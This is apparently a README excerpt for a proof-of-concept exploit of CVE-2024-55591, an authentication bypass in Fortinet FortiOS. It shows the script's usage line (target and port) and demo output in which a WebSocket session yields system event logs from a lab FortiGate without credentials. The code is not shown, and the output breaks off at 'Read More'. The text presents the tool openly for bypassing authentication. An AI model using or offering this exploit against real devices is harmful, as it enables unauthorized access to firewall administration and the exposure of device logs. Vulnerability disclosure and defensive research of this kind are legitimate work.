CVE-2024-55591 A Fortinet FortiOS Authentication Bypass Vulnerable PoC Description Use this poc,you can bypass authentication and see system log USEAGE sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 poc.py usage: poc.py [-h] –target TARGET [–port PORT] poc.py: error: the following arguments are required: –target/-t Demo poc output “` sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 poc.py -t 192.168.182.188 -p 443 WebSocket handshake successful! {'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 22, 'payload_data': b'{"type":"initialized"}'} {'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 578, 'payload_data': b'{"type":"eventLog","payload":{"id":32002,"name":"LOG_ID_ADMIN_LOGIN_FAIL","vdom":"root","log":{"date":"2025-01-21","time":"04:25:33","eventtime":"1737462333650070902","tz":"-0800","logid":"0100032002","type":"event","subtype":"system","level":"alert","vd":"root","logdesc":"Admin login failed","sn":"0","user":"asdasd","ui":"https(192.168.182.135)","method":"https","srcip":"192.168.182.135","dstip":"192.168.182.188","action":"login","status":"failed","reason":"name_invalid","msg":"Administrator asdasd login failed from https(192.168.182.135) because of invalid user name"}}}'} {'fin': 1, 'rsv': (0, 0, 0), 'opcode': 1, 'mask': 0, 'payload_length': 360, 'payload_data':…Read More